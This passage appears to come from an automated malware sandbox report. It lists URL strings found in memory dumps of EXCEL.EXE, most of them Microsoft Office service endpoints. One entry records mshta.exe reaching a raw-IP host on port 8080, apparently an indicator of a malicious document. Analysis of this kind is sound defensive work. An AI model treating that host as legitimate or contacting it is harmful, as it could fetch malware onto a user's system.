Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comz
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileI
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dev.cortana.ai-
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/a
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EXCEL.EXE, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comBearer
Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comt
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/=
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1U
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/E
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/v
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://entitlement.diagnostics.office.com4
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://entitlement.diagnosticssdf.office.comX
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechnWz
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android?
Source: mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmp String found in binary or memory: https://fs.230.250.107:8080/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://graph.ppe.windows.net/;
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://graph.windows.net
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://graph.windows.net/G
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://graph.windows.net/ent
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com
